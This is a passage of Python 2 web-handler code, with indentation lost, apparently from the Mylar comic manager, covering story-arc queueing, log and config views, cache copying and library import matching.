logger.fdebug("-- NOT a watched series queue.")
logger.fdebug('%s -- #%s' % (watchchk['ComicName'], watchchk['IssueNumber']))
logger.fdebug('Story Arc : %s queueing up the selected issue...' % SARC)
logger.fdebug('IssueArcID : %s' % IssueArcID)
try:
issueyear = watchchk['IssueYEAR']
logger.fdebug('issueYEAR : %s' % issueyear)
except:
try:
issueyear = watchchk['IssueDate'][:4]
except:
issueyear = watchchk['ReleaseDate'][:4]
stdate = watchchk['ReleaseDate']
issdate = watchchk['IssueDate']
logger.fdebug('issueyear : %s' % issueyear)
logger.fdebug('comicname : %s' % watchchk['ComicName'])
logger.fdebug('issuenumber : %s' % watchchk['IssueNumber'])
logger.fdebug('comicyear : %s' % watchchk['SeriesYear'])
#logger.info('publisher : ' + watchchk['IssuePublisher']) <-- no publisher in table
logger.fdebug('SARC : %s' % SARC)
logger.fdebug('IssueArcID : %s' % IssueArcID)
passinfo = {'issueid': s_issueid,
'comicname': watchchk['ComicName'],
'seriesyear': watchchk['SeriesYear'],
'comicid': s_comicid,
'issuenumber': watchchk['IssueNumber'],
'booktype': watchchk['Type']}
#foundcom, prov = search.search_init(ComicName=watchchk['ComicName'], IssueNumber=watchchk['IssueNumber'], ComicYear=issueyear, SeriesYear=watchchk['SeriesYear'], Publisher=None, IssueDate=issdate, StoreDate=stdate, IssueID=s_issueid, SARC=SARC, IssueArcID=IssueArcID, oneoff=True)
else:
# it's a watched series
s_comicid = issuechk['ComicID']
s_issueid = issuechk['IssueID']
logger.fdebug('-- watched series queue.')
logger.fdebug('%s -- #%s' % (issuechk['ComicName'], issuechk['Issue_Number']))
passinfo = {'issueid': s_issueid,
'comicname': issuechk['ComicName'],
'seriesyear': issuechk['SeriesYear'],
'comicid': s_comicid,
'issuenumber': issuechk['Issue_Number'],
'booktype': issuechk['Type']}
#foundcom, prov = search.search_init(ComicName=issuechk['ComicName'], IssueNumber=issuechk['Issue_Number'], ComicYear=issuechk['IssueYear'], SeriesYear=issuechk['SeriesYear'], Publisher=None, IssueDate=None, StoreDate=issuechk['ReleaseDate'], IssueID=issuechk['IssueID'], AlternateSearch=None, UseFuzzy=None, ComicVersion=None, SARC=SARC, IssueArcID=IssueArcID, mode=None, rsscheck=None, ComicID=None)
mylar.SEARCH_QUEUE.put(passinfo)
#if foundcom['status'] is True:
# updater.foundsearch(s_comicid, s_issueid, mode=mode, provider=prov, SARC=SARC, IssueArcID=IssueArcID)
#else:
# logger.fdebug('Watchlist issue not sucessfully found')
# logger.fdebug('issuearcid: %s' % IssueArcID)
# logger.fdebug('issueid: %s' % s_issueid)
# stupdate.append({"Status": "Wanted",
# "IssueArcID": IssueArcID,
# "IssueID": s_issueid})
if len(stupdate) > 0:
logger.fdebug('%s issues need to get updated to Wanted Status' % len(stupdate))
for st in stupdate:
ctrlVal = {'IssueArcID': st['IssueArcID']}
newVal = {'Status': st['Status']}
if st['IssueID']:
if st['IssueID']:
logger.fdebug('issueid: %s' %st['IssueID'])
newVal['IssueID'] = st['IssueID']
myDB.upsert("storyarcs", newVal, ctrlVal)
ReadGetWanted.exposed = True
def ReadMassCopy(self, StoryArcID, StoryArcName):
#this copies entire story arcs into the /cache/<storyarc> folder
#alternatively, it will copy the issues individually directly to a 3rd party device (ie.tablet)
myDB = db.DBConnection()
copylist = myDB.select("SELECT * FROM readlist WHERE StoryArcID=? AND Status='Downloaded'", [StoryArcID])
if copylist is None:
logger.fdebug("You don't have any issues from " + StoryArcName + ". Aborting Mass Copy.")
return
else:
dst = os.path.join(mylar.CONFIG.CACHE_DIR, StoryArcName)
for files in copylist:
copyloc = files['Location']
ReadMassCopy.exposed = True
def logs(self):
return serve_template(templatename="logs.html", title="Log", lineList=mylar.LOGLIST)
logs.exposed = True
def config_dump(self):
return serve_template(templatename="config_dump.html", title="Config Listing", lineList=mylar.CONFIG)
config_dump.exposed = True
def clearLogs(self):
mylar.LOGLIST = []
logger.info("Web logs cleared")
raise cherrypy.HTTPRedirect("logs")
clearLogs.exposed = True
def toggleVerbose(self):
if mylar.LOG_LEVEL != 2:
mylar.LOG_LEVEL = 2
else:
mylar.LOG_LEVEL = 1
if logger.LOG_LANG.startswith('en'):
logger.initLogger(console=not mylar.QUIET, log_dir=mylar.CONFIG.LOG_DIR, max_logsize=mylar.CONFIG.MAX_LOGSIZE, max_logfiles=mylar.CONFIG.MAX_LOGFILES, loglevel=mylar.LOG_LEVEL)
else:
logger.mylar_log.stopLogger()
logger.mylar_log.initLogger(loglevel=mylar.LOG_LEVEL, log_dir=mylar.CONFIG.LOG_DIR, max_logsize=mylar.CONFIG.MAX_LOGSIZE, max_logfiles=mylar.CONFIG.MAX_LOGFILES)
#mylar.VERBOSE = not mylar.VERBOSE
#logger.initLogger(console=not mylar.QUIET,
# log_dir=mylar.CONFIG.LOG_DIR, verbose=mylar.VERBOSE)
if mylar.LOG_LEVEL == 2:
logger.info("Verbose (DEBUG) logging is enabled")
logger.debug("If you can read this message, debug logging is now working")
else:
logger.info("normal (INFO) logging is now enabled")
raise cherrypy.HTTPRedirect("logs")
toggleVerbose.exposed = True
def getLog(self, iDisplayStart=0, iDisplayLength=100, iSortCol_0=0, sSortDir_0="desc", sSearch="", **kwargs):
iDisplayStart = int(iDisplayStart)
iDisplayLength = int(iDisplayLength)
filtered = []
if sSearch == "" or sSearch == None:
filtered = mylar.LOGLIST[::]
else:
filtered = [row for row in mylar.LOGLIST for column in row if sSearch.lower() in column.lower()]
sortcolumn = 0
if iSortCol_0 == '1':
sortcolumn = 2
elif iSortCol_0 == '2':
sortcolumn = 1
filtered.sort(key=lambda x: x[sortcolumn], reverse=sSortDir_0 == "desc")
rows = filtered[iDisplayStart:(iDisplayStart + iDisplayLength)]
rows = [[row[0], row[2], row[1]] for row in rows]
return json.dumps({
'iTotalDisplayRecords': len(filtered),
'iTotalRecords': len(mylar.LOGLIST),
'aaData': rows,
})
getLog.exposed = True
def getConfig(self, iDisplayStart=0, iDisplayLength=100, iSortCol_0=0, sSortDir_0="desc", sSearch="", **kwargs):
iDisplayStart = int(iDisplayStart)
iDisplayLength = int(iDisplayLength)
unfiltered = []
for each_section in mylar.config.config.sections():
for k,v in mylar.config.config.items(each_section):
unfiltered.insert( 0, (k, v.decode('utf-8')) )
if sSearch == "" or sSearch == None:
logger.info('getConfig: No search terms.')
filtered = unfiltered
else:
logger.info('getConfig: Searching for ' + sSearch)
dSearch = {sSearch: '.'}
filtered = [row for row in unfiltered for column in row if sSearch.lower() in column.lower()]
sortcolumn = 0
if iSortCol_0 == '1':
sortcolumn = 2
elif iSortCol_0 == '2':
sortcolumn = 1
filtered.sort(key=lambda x: x[sortcolumn], reverse=sSortDir_0 == "desc")
rows = filtered[iDisplayStart:(iDisplayStart + iDisplayLength)]
return json.dumps({
'iTotalDisplayRecords': len(filtered),
'iTotalRecords': len(unfiltered),
'aaData': rows,
})
getConfig.exposed = True
def clearhistory(self, type=None):
myDB = db.DBConnection()
if type == 'all':
logger.info(u"Clearing all history")
myDB.action('DELETE from snatched')
else:
logger.info(u"Clearing history where status is %s" % type)
myDB.action('DELETE from snatched WHERE Status=?', [type])
if type == 'Processed':
myDB.action("DELETE from snatched WHERE Status='Post-Processed'")
raise cherrypy.HTTPRedirect("history")
clearhistory.exposed = True
def downloadLocal(self, IssueID=None, IssueArcID=None, ReadOrder=None, dir=None):
myDB = db.DBConnection()
issueDL = myDB.selectone("SELECT * FROM issues WHERE IssueID=?", [IssueID]).fetchone()
comicid = issueDL['ComicID']
#print ("comicid: " + str(comicid))
comic = myDB.selectone("SELECT * FROM comics WHERE ComicID=?", [comicid]).fetchone()
#---issue info
comicname = comic['ComicName']
issuenum = issueDL['Issue_Number']
issuedate = issueDL['IssueDate']
seriesyear = comic['ComicYear']
#---
issueLOC = comic['ComicLocation']
#print ("IssueLOC: " + str(issueLOC))
issueFILE = issueDL['Location']
#print ("IssueFILE: "+ str(issueFILE))
issuePATH = os.path.join(issueLOC, issueFILE)
#print ("IssuePATH: " + str(issuePATH))
# if dir is None, it's a normal copy to cache kinda thing.
# if dir is a path, then it's coming from the pullist as the location to put all the weekly comics
if dir is not None:
dstPATH = dir
else:
dstPATH = os.path.join(mylar.CONFIG.CACHE_DIR, issueFILE)
#print ("dstPATH: " + str(dstPATH))
if IssueID:
ISnewValueDict = {'inCacheDIR': 'True',
'Location': issueFILE}
if IssueArcID:
if mylar.CONFIG.READ2FILENAME:
#if it's coming from a StoryArc, check to see if we're appending the ReadingOrder to the filename
ARCissueFILE = ReadOrder + "-" + issueFILE
dstPATH = os.path.join(mylar.CONFIG.CACHE_DIR, ARCissueFILE)
ISnewValueDict = {'inCacheDIR': 'True',
'Location': issueFILE}
# issueDL = myDB.action("SELECT * FROM storyarcs WHERE IssueArcID=?", [IssueArcID]).fetchone()
# storyarcid = issueDL['StoryArcID']
# #print ("comicid: " + str(comicid))
# issueLOC = mylar.CONFIG.DESTINATION_DIR
# #print ("IssueLOC: " + str(issueLOC))
# issueFILE = issueDL['Location']
# #print ("IssueFILE: "+ str(issueFILE))
# issuePATH = os.path.join(issueLOC,issueFILE)
# #print ("IssuePATH: " + str(issuePATH))
# dstPATH = os.path.join(mylar.CONFIG.CACHE_DIR, issueFILE)
# #print ("dstPATH: " + str(dstPATH))
try:
shutil.copy2(issuePATH, dstPATH)
except IOError as e:
logger.error("Could not copy " + str(issuePATH) + " to " + str(dstPATH) + ". Copy to Cache terminated.")
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
#logger.debug("sucessfully copied to cache...Enabling Download link")
controlValueDict = {'IssueID': IssueID}
RLnewValueDict = {'inCacheDIR': 'True',
'Location': issueFILE,
'ComicID': comicid,
'ComicName': comicname,
'Issue_Number': issuenum,
'SeriesYear': seriesyear,
'IssueDate': issuedate}
myDB.upsert("readlist", RLnewValueDict, controlValueDict)
myDB.upsert("issues", ISnewValueDict, controlValueDict)
if IssueArcID:
controlValueD = {'IssueArcID': IssueArcID}
newValueDict = {'inCacheDIR': 'True',
'Location': ARCissueFILE}
myDB.upsert("storyarcs", newValueDict, controlValueD)
#print("DB updated - Download link now enabled.")
downloadLocal.exposed = True
def MassWeeklyDownload(self, weeknumber=None, year=None, midweek=None, weekfolder=0, filename=None):
if filename is None:
mylar.CONFIG.WEEKFOLDER = bool(int(weekfolder))
mylar.CONFIG.writeconfig(values={'weekfolder': mylar.CONFIG.WEEKFOLDER})
raise cherrypy.HTTPRedirect("pullist")
# this will download all downloaded comics from the weekly pull list and throw them
# into a 'weekly' pull folder for those wanting to transfer directly to a 3rd party device.
myDB = db.DBConnection()
if mylar.CONFIG.WEEKFOLDER:
if mylar.CONFIG.WEEKFOLDER_LOC:
dstdir = mylar.CONFIG.WEEKFOLDER_LOC
else:
dstdir = mylar.CONFIG.DESTINATION_DIR
if mylar.CONFIG.WEEKFOLDER_FORMAT == 0:
#0 = YYYY-mm
desdir = os.path.join(dstdir, str(year) + '-' + str(weeknumber))
elif mylar.CONFIG.WEEKFOLDER_FORMAT == 1:
#1 = YYYY-mm-dd (midweek)
desdir = os.path.join(dstdir, str(midweek))
chkdir = filechecker.validateAndCreateDirectory(desdir, create=True, module='WEEKLY-FOLDER')
if not chkdir:
logger.warn('Unable to create weekly directory. Check location & permissions. Aborting Copy.')
return
else:
desdir = mylar.CONFIG.GRABBAG_DIR
issuelist = helpers.listIssues(weeknumber,year)
if issuelist is None: # nothing on the list, just go go gone
logger.info("There aren't any issues downloaded from this week yet.")
else:
iscount = 0
for issue in issuelist:
#logger.fdebug('Checking status of ' + issue['ComicName'] + ' #' + str(issue['Issue_Number']))
if issue['Status'] == 'Downloaded':
logger.info('Status Downloaded.')
self.downloadLocal(issue['IssueID'], dir=desdir)
logger.info("Copied " + issue['ComicName'] + " #" + str(issue['Issue_Number']) + " to " + desdir.encode('utf-8').strip())
iscount+=1
logger.info('I have copied ' + str(iscount) + ' issues from week #' + str(weeknumber) + ' pullist as requested.')
raise cherrypy.HTTPRedirect("pullist?week=%s&year=%s" % (weeknumber, year))
MassWeeklyDownload.exposed = True
def idirectory(self):
return serve_template(templatename="idirectory.html", title="Import a Directory")
idirectory.exposed = True
def confirmResult(self, comicname, comicid):
mode='series'
sresults = mb.findComic(comicname, mode, None)
type='comic'
return serve_template(templatename="searchresults.html", title='Import Results for: "' + comicname + '"', searchresults=sresults, type=type, imported='confirm', ogcname=comicid)
confirmResult.exposed = True
def Check_ImportStatus(self):
#logger.info('import_status: ' + mylar.IMPORT_STATUS)
return mylar.IMPORT_STATUS
Check_ImportStatus.exposed = True
def comicScan(self, path, scan=0, libraryscan=0, redirect=None, autoadd=0, imp_move=0, imp_paths=0, imp_rename=0, imp_metadata=0, forcescan=0):
import Queue
queue = Queue.Queue()
#save the values so they stick.
mylar.CONFIG.ADD_COMICS = autoadd
#too many problems for windows users, have to rethink this....
#if 'windows' in mylar.OS_DETECT.lower() and '\\\\?\\' not in path:
# #to handle long paths, let's append the '\\?\' to the path to allow for unicode windows api access
# path = "\\\\?\\" + path
mylar.CONFIG.COMIC_DIR = path
mylar.CONFIG.IMP_MOVE = bool(imp_move)
mylar.CONFIG.IMP_RENAME = bool(imp_rename)
mylar.CONFIG.IMP_METADATA = bool(imp_metadata)
mylar.CONFIG.IMP_PATHS = bool(imp_paths)
mylar.CONFIG.configure(update=True)
# Write the config
logger.info('Now updating config...')
mylar.CONFIG.writeconfig()
logger.info('forcescan is: ' + str(forcescan))
if mylar.IMPORTLOCK and forcescan == 1:
logger.info('Removing Current lock on import - if you do this AND another process is legitimately running, your causing your own problems.')
mylar.IMPORTLOCK = False
#thread the scan.
if scan == '1':
scan = True
mylar.IMPORT_STATUS = 'Now starting the import'
return self.ThreadcomicScan(scan, queue)
else:
scan = False
return
comicScan.exposed = True
def ThreadcomicScan(self, scan, queue):
thread_ = threading.Thread(target=librarysync.scanLibrary, name="LibraryScan", args=[scan, queue])
thread_.start()
thread_.join()
chk = queue.get()
while True:
if chk[0]['result'] == 'success':
yield chk[0]['result']
logger.info('Successfully scanned in directory. Enabling the importResults button now.')
mylar.IMPORTBUTTON = True #globally set it to ON after the scan so that it will be picked up.
mylar.IMPORT_STATUS = 'Import completed.'
break
else:
yield ckh[0]['result']
mylar.IMPORTBUTTON = False
break
return
ThreadcomicScan.exposed = True
def importResults(self):
myDB = db.DBConnection()
results = myDB.select("SELECT * FROM importresults WHERE WatchMatch is Null OR WatchMatch LIKE 'C%' group by DynamicName, Volume, Status COLLATE NOCASE")
#this is to get the count of issues;
res = []
countit = []
ann_cnt = 0
for result in results:
res.append(result)
for x in res:
if x['Volume']:
#because Volume gets stored as NULL in the db, we need to account for it coming into here as a possible None value.
countthis = myDB.select("SELECT count(*) FROM importresults WHERE DynamicName=? AND Volume=? AND Status=?", [x['DynamicName'],x['Volume'],x['Status']])
countannuals = myDB.select("SELECT count(*) FROM importresults WHERE DynamicName=? AND Volume=? AND IssueNumber LIKE 'Annual%' AND Status=?", [x['DynamicName'],x['Volume'],x['Status']])
else:
countthis = myDB.select("SELECT count(*) FROM importresults WHERE DynamicName=? AND Volume IS NULL AND Status=?", [x['DynamicName'],x['Status']])
countannuals = myDB.select("SELECT count(*) FROM importresults WHERE DynamicName=? AND Volume IS NULL AND IssueNumber LIKE 'Annual%' AND Status=?", [x['DynamicName'],x['Status']])
countit.append({"DynamicName": x['DynamicName'],
"Volume": x['Volume'],
"IssueCount": countthis[0][0],
"AnnualCount": countannuals[0][0],
"ComicName": x['ComicName'],
"DisplayName": x['DisplayName'],
"Volume": x['Volume'],
"ComicYear": x['ComicYear'],
"Status": x['Status'],
"ComicID": x['ComicID'],
"WatchMatch": x['WatchMatch'],
"ImportDate": x['ImportDate'],
"SRID": x['SRID']})
return serve_template(templatename="importresults.html", title="Import Results", results=countit) #results, watchresults=watchresults)
importResults.exposed = True
def ImportFilelisting(self, comicname, dynamicname, volume):
comicname = urllib.unquote_plus(helpers.conversion(comicname))
dynamicname = helpers.conversion(urllib.unquote_plus(dynamicname)) #urllib.unquote(dynamicname).decode('utf-8')
myDB = db.DBConnection()
if volume is None or volume == 'None':
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume IS NULL",[dynamicname])
else:
if not volume.lower().startswith('v'):
volume = 'v' + str(volume)
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume=?",[dynamicname,volume])
filelisting = '<table width="500"><tr><td>'
filelisting += '<center><b>Files that have been scanned in for:</b></center>'
if volume is None or volume == 'None':
filelisting += '<center><b>' + comicname + '</b></center></td></tr><tr><td>'
else:
filelisting += '<center><b>' + comicname + ' [' + str(volume) + ']</b></center></td></tr><tr><td>'
#filelisting += '<div style="height:300px;overflow:scroll;overflow-x:hidden;">'
filelisting += '<div style="display:inline-block;overflow-y:auto:overflow-x:hidden;">'
cnt = 0
for result in results:
filelisting += result['ComicFilename'] + '</br>'
filelisting += '</div></td></tr>'
filelisting += '<tr><td align="right">' + str(len(results)) + ' Files.</td></tr>'
filelisting += '</table>'
return filelisting
ImportFilelisting.exposed = True
def deleteimport(self, ComicName, volume, DynamicName, Status):
myDB = db.DBConnection()
if volume is None or volume == 'None':
logname = ComicName
else:
logname = ComicName + '[' + str(volume) + ']'
logger.info("Removing import data for Comic: " + logname)
if volume is None or volume == 'None':
myDB.action('DELETE from importresults WHERE DynamicName=? AND Status=? AND (Volume is NULL OR Volume="None")', [DynamicName, Status])
else:
myDB.action('DELETE from importresults WHERE DynamicName=? AND Volume=? AND Status=?', [DynamicName, volume, Status])
raise cherrypy.HTTPRedirect("importResults")
deleteimport.exposed = True
def preSearchit(self, ComicName, comiclist=None, mimp=0, volume=None, displaycomic=None, comicid=None, dynamicname=None, displayline=None):
if mylar.IMPORTLOCK:
logger.info('[IMPORT] There is an import already running. Please wait for it to finish, and then you can resubmit this import.')
return
importlock = threading.Lock()
myDB = db.DBConnection()
if mimp == 0:
comiclist = []
comiclist.append({"ComicName": ComicName,
"DynamicName": dynamicname,
"Volume": volume,
"ComicID": comicid})
with importlock:
#set the global importlock here so that nothing runs and tries to refresh things simultaneously...
mylar.IMPORTLOCK = True
#do imports that have the comicID already present (ie. metatagging has returned valid hits).
#if a comicID is present along with an IssueID - then we have valid metadata.
#otherwise, comicID present by itself indicates a watch match that already exists and is done below this sequence.
RemoveIDS = []
for comicinfo in comiclist:
logger.fdebug('[IMPORT] Checking for any valid ComicID\'s already present within filenames.')
logger.fdebug('[IMPORT] %s:' % comicinfo)
if comicinfo['ComicID'] is None or comicinfo['ComicID'] == 'None':
continue
else:
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND ComicID=?", [comicinfo['ComicID']])
files = []
for result in results:
files.append({'comicfilename': result['ComicFilename'],
'comiclocation': result['ComicLocation'],
'issuenumber': result['IssueNumber'],
'import_id': result['impID']})
import random
SRID = str(random.randint(100000, 999999))
logger.info('[IMPORT] Issues found with valid ComicID information for : %s [%s]' % (comicinfo['ComicName'], comicinfo['ComicID']))
imported = {'ComicName': comicinfo['ComicName'],
'DynamicName': comicinfo['DynamicName'],
'Volume': comicinfo['Volume'],
'filelisting': files,
'srid': SRID}
self.addbyid(comicinfo['ComicID'], calledby=True, imported=imported, ogcname=comicinfo['ComicName'], nothread=True)
#if move files wasn't used - we need to update status at this point.
#if mylar.CONFIG.IMP_MOVE is False:
# #status update.
# for f in files:
# ctrlVal = {"ComicID": comicinfo['ComicID'],
# "impID": f['import_id']}
# newVal = {"Status": 'Imported',
# "SRID": SRID,
# "ComicFilename": f['comicfilename'],
# "ComicLocation": f['comiclocation'],
# "Volume": comicinfo['Volume'],
# "IssueNumber": comicinfo['IssueNumber'],
# "ComicName": comicinfo['ComicName'],
# "DynamicName": comicinfo['DynamicName']}
# myDB.upsert("importresults", newVal, ctrlVal)
logger.info('[IMPORT] Successfully verified import sequence data for : %s. Currently adding to your watchlist.' % comicinfo['ComicName'])
RemoveIDS.append(comicinfo['ComicID'])
#we need to remove these items from the comiclist now, so they don't get processed again
if len(RemoveIDS) > 0:
for RID in RemoveIDS:
newlist = [k for k in comiclist if k['ComicID'] != RID]
comiclist = newlist
for cl in comiclist:
ComicName = cl['ComicName']
volume = cl['Volume']
DynamicName = cl['DynamicName']
#logger.fdebug('comicname: ' + ComicName)
#logger.fdebug('dyn: ' + DynamicName)
if volume is None or volume == 'None':
comic_and_vol = ComicName
else:
comic_and_vol = '%s (%s)' % (ComicName, volume)
logger.info('[IMPORT][%s] Now preparing to import. First I need to determine the highest issue, and possible year(s) of the series.' % comic_and_vol)
if volume is None or volume == 'None':
logger.fdebug('[IMPORT] [none] dynamicname: %s' % DynamicName)
logger.fdebug('[IMPORT] [none] volume: None')
results = myDB.select("SELECT * FROM importresults WHERE DynamicName=? AND Volume IS NULL AND Status='Not Imported'", [DynamicName])
else:
logger.fdebug('[IMPORT] [!none] dynamicname: %s' % DynamicName)
logger.fdebug('[IMPORT] [!none] volume: %s' % volume)
results = myDB.select("SELECT * FROM importresults WHERE DynamicName=? AND Volume=? AND Status='Not Imported'", [DynamicName,volume])
if not results:
logger.fdebug('[IMPORT] I cannot find any results for the given series. I should remove this from the list.')
continue
#if results > 0:
# print ("There are " + str(results[7]) + " issues to import of " + str(ComicName))
#build the valid year ranges and the minimum issue# here to pass to search.
yearRANGE = []
yearTOP = 0
minISSUE = 0
startISSUE = 10000000
starttheyear = None
comicstoIMP = []
movealreadyonlist = "no"
movedata = []
for result in results:
if result is None or result == 'None':
logger.info('[IMPORT] Ultron gave me bad information, this issue wont import correctly: %s' & DynamicName)
break
if result['WatchMatch']:
watchmatched = result['WatchMatch']
else:
watchmatched = ''
if watchmatched.startswith('C'):
comicid = result['WatchMatch'][1:]
#since it's already in the watchlist, we just need to move the files and re-run the filechecker.
#self.refreshArtist(comicid=comicid,imported='yes')
if mylar.CONFIG.IMP_MOVE:
comloc = myDB.selectone("SELECT * FROM comics WHERE ComicID=?", [comicid]).fetchone()
movedata_comicid = comicid
movedata_comiclocation = comloc['ComicLocation']
movedata_comicname = ComicName
movealreadyonlist = "yes"
#mylar.moveit.movefiles(comicid,comloc['ComicLocation'],ComicName)
#check for existing files... (this is already called after move files in importer)
#updater.forceRescan(comicid)
else:
raise cherrypy.HTTPRedirect("importResults")
else:
#logger.fdebug('result: %s' % result)
comicstoIMP.append(result['ComicLocation']) #.decode(mylar.SYS_ENCODING, 'replace'))
getiss = result['IssueNumber']
#logger.fdebug('getiss: %s' % getiss)
if 'annual' in getiss.lower():
tmpiss = re.sub('[^0-9]','', getiss).strip()
if any([tmpiss.startswith('19'), tmpiss.startswith('20')]) and len(tmpiss) == 4:
logger.fdebug('[IMPORT] annual detected with no issue [%s]. Skipping this entry for determining series length.' % getiss)
continue
else:
if (result['ComicYear'] not in yearRANGE) or all([yearRANGE is None, yearRANGE == 'None']):
if result['ComicYear'] <> "0000" and result['ComicYear'] is not None:
yearRANGE.append(str(result['ComicYear']))
yearTOP = str(result['ComicYear'])
getiss_num = helpers.issuedigits(getiss)
miniss_num = helpers.issuedigits(minISSUE)
startiss_num = helpers.issuedigits(startISSUE)
if int(getiss_num) > int(miniss_num):
logger.fdebug('Minimum issue now set to : %s - it was %s' % (getiss, minISSUE))
minISSUE = getiss
if int(getiss_num) < int(startiss_num):
logger.fdebug('Start issue now set to : %s - it was %s' % (getiss, startISSUE))
startISSUE = str(getiss)
if helpers.issuedigits(startISSUE) == 1000 and result['ComicYear'] is not None: # if it's an issue #1, get the year and assume that's the start.
startyear = result['ComicYear']
#taking this outside of the transaction in an attempt to stop db locking.
if mylar.CONFIG.IMP_MOVE and movealreadyonlist == "yes":
mylar.moveit.movefiles(movedata_comicid, movedata_comiclocation, movedata_comicname)
updater.forceRescan(comicid)
raise cherrypy.HTTPRedirect("importResults")
#figure out # of issues and the year range allowable
logger.fdebug('[IMPORT] yearTOP: %s' % yearTOP)
logger.fdebug('[IMPORT] yearRANGE: %s' % yearRANGE)
if starttheyear is None:
if all([yearTOP != None, yearTOP != 'None']):
if int(str(yearTOP)) > 0:
minni = helpers.issuedigits(minISSUE)
#logger.info(minni)
if minni < 1 or minni > 999999999:
maxyear = int(str(yearTOP))
else:
maxyear = int(str(yearTOP)) - ( (minni/1000) / 12 )
if str(maxyear) not in yearRANGE:
#logger.info('maxyear:' + str(maxyear))
#logger.info('yeartop:' + str(yearTOP))
for i in range(maxyear, int(yearTOP),1):
if not any(int(x) == int(i) for x in yearRANGE):
yearRANGE.append(str(i))
else:
yearRANGE = None
else:
yearRANGE = None
else:
yearRANGE.append(starttheyear)
if yearRANGE is not None:
yearRANGE = sorted(yearRANGE, reverse=True)
#determine a best-guess to # of issues in series
#this needs to be reworked / refined ALOT more.
#minISSUE = highest issue #, startISSUE = lowest issue #
numissues = len(comicstoIMP)
logger.fdebug('[IMPORT] number of issues: %s' % numissues)
ogcname = ComicName
mode='series'
displaycomic = helpers.filesafe(ComicName)
displaycomic = re.sub('[\-]','', displaycomic).strip()
displaycomic = re.sub('\s+', ' ', displaycomic).strip()
logger.fdebug('[IMPORT] displaycomic : %s' % displaycomic)
logger.fdebug('[IMPORT] comicname : %s' % ComicName)
searchterm = '"' + displaycomic + '"'
try:
if yearRANGE is None:
sresults = mb.findComic(searchterm, mode, issue=numissues) #ogcname, mode, issue=numissues, explicit='all') #ComicName, mode, issue=numissues)
else:
sresults = mb.findComic(searchterm, mode, issue=numissues, limityear=yearRANGE) #ogcname, mode, issue=numissues, limityear=yearRANGE, explicit='all') #ComicName, mode, issue=numissues, limityear=yearRANGE)
except TypeError:
logger.warn('[IMPORT] Comicvine API limit has been reached, and/or the comicvine website is not responding. Aborting process at this time, try again in an ~ hr when the api limit is reset.')
break
else:
if sresults is False:
sresults = []
type='comic'
#we now need to cycle through the results until we get a hit on both dynamicname AND year (~count of issues possibly).
logger.fdebug('[IMPORT] [%s] search results' % len(sresults))
search_matches = []
for results in sresults:
rsn = filechecker.FileChecker()
rsn_run = rsn.dynamic_replace(results['name'])
result_name = rsn_run['mod_seriesname']
result_comicid = results['comicid']
result_year = results['comicyear']
if float(int(results['issues']) / 12):
totalissues = (int(results['issues']) / 12) + 1
else:
totalissues = int(results['issues']) / 12
totalyear_range = int(result_year) + totalissues #2000 + (101 / 12) 2000 +8.4 = 2008
logger.fdebug('[IMPORT] [%s] Comparing: %s - TO - %s' % (totalyear_range, re.sub('[\|\s]', '', DynamicName.lower()).strip(), re.sub('[\|\s]', '', result_name.lower()).strip()))
if any([str(totalyear_range) in results['seriesrange'], result_year in results['seriesrange']]):
logger.fdebug('[IMPORT] LastIssueID: %s' % results['lastissueid'])
if re.sub('[\|\s]', '', DynamicName.lower()).strip() == re.sub('[\|\s]', '', result_name.lower()).strip():
logger.fdebug('[IMPORT MATCH] %s (%s)' % (result_name, result_comicid))
search_matches.append({'comicid': results['comicid'],
'series': results['name'],
'dynamicseries': result_name,
'seriesyear': result_year,
'publisher': results['publisher'],
'haveit': results['haveit'],
'name': results['name'],
'deck': results['deck'],
'url': results['url'],
'description': results['description'],
'comicimage': results['comicimage'],
'issues': results['issues'],
'ogcname': ogcname,
'comicyear': results['comicyear']})
if len(search_matches) == 1:
sr = search_matches[0]
logger.info('[IMPORT] There is only one result...automagik-mode enabled for %s :: %s' % (sr['series'], sr['comicid']))
resultset = 1
else:
if len(search_matches) == 0 or len(search_matches) is None:
logger.fdebug("[IMPORT] no results, removing the year from the agenda and re-querying.")
sresults = mb.findComic(searchterm, mode, issue=numissues) #ComicName, mode, issue=numissues)
logger.fdebug('[IMPORT] [%s] search results' % len(sresults))
for results in sresults:
rsn = filechecker.FileChecker()
rsn_run = rsn.dynamic_replace(results['name'])
result_name = rsn_run['mod_seriesname']
result_comicid = results['comicid']
result_year = results['comicyear']
if float(int(results['issues']) / 12):
totalissues = (int(results['issues']) / 12) + 1
else:
totalissues = int(results['issues']) / 12
totalyear_range = int(result_year) + totalissues #2000 + (101 / 12) 2000 +8.4 = 2008
logger.fdebug('[IMPORT][%s] Comparing: %s - TO - %s' % (totalyear_range, re.sub('[\|\s]', '', DynamicName.lower()).strip(), re.sub('[\|\s]', '', result_name.lower()).strip()))
if any([str(totalyear_range) in results['seriesrange'], result_year in results['seriesrange']]):
if re.sub('[\|\s]', '', DynamicName.lower()).strip() == re.sub('[\|\s]', '', result_name.lower()).strip():
logger.fdebug('[IMPORT MATCH] %s (%s)' % (result_name, result_comicid))
search_matches.append({'comicid': results['comicid'],
'series': results['name'],
'dynamicseries': result_name,
'seriesyear': result_year,
'publisher': results['publisher'],
'haveit': results['haveit'],
'name': results['name'],
'deck': results['deck'],
'url': results['url'],
'description': results['description'],
'comicimage': results['comicimage'],
'issues': results['issues'],
'ogcname': ogcname,
'comicyear': results['comicyear']})
if len(search_matches) == 1:
sr = search_matches[0]
logger.info('[IMPORT] There is only one result...automagik-mode enabled for %s :: %s' % (sr['series'], sr['comicid']))
resultset = 1
else:
resultset = 0
else:
logger.info('[IMPORT] Returning results to Select option - there are %s possibilities, manual intervention required.' % len(search_matches))
resultset = 0
#generate random Search Results ID to allow for easier access for viewing logs / search results.
import random
SRID = str(random.randint(100000, 999999))
#link the SRID to the series that was just imported so that it can reference the search results when requested.
if volume is None or volume == 'None':
ctrlVal = {"DynamicName": DynamicName}
else:
ctrlVal = {"DynamicName": DynamicName,
"Volume": volume}
if len(sresults) > 1 or len(search_matches) > 1:
newVal = {"SRID": SRID,
"Status": 'Manual Intervention',
"ComicName": ComicName}
else:
newVal = {"SRID": SRID,
"Status": 'Importing',
"ComicName": ComicName}
